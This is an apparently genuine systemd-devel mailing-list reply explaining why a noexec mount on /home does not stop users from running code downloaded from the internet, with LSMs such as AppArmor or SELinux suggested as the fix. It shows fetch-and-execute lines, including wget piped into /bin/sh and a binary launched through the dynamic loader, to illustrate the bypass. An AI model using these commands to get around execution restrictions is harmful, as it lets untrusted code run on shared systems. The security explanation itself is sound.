On 16/02/15 18:14, Павел Самсонов wrote:
If I have multiuser Linux installation with shell and DE access, my
users have not places in system, where they able download something from
internet and execute:
...
/home rw,noexec
noexec is not sufficient to do what you have said. For instance, your
users could do any of these:
wget http://example.com/malware.sh
/bin/sh malware.sh
wget -O - http://example.com/malware.sh | /bin/sh
wget http://example.com/malware.x86.bin
/lib/ld-linux.so.2 malware.x86.bin
(Or replace /bin/sh with Python, Perl etc., or the x86 executable with
any architecture your machine can run.)
Users who can execute arbitrary code with their own privileges, and
obtain arbitrary files from the Internet, can execute arbitrary code
from the Internet with their own privileges. You are unlikely to be able
to avoid this without LSMs.
If you use an LSM (AppArmor, SELinux, etc.) and "confine" your users,
you might be able to achieve what you think you have already achieved.
--
Simon McVittie
Collabora Ltd. <http://www.collabora.com/>
_______________________________________________
systemd-devel mailing list
systemd-devel@lists.freedesktop.org
http://lists.freedesktop.org/mailman/listinfo/systemd-devel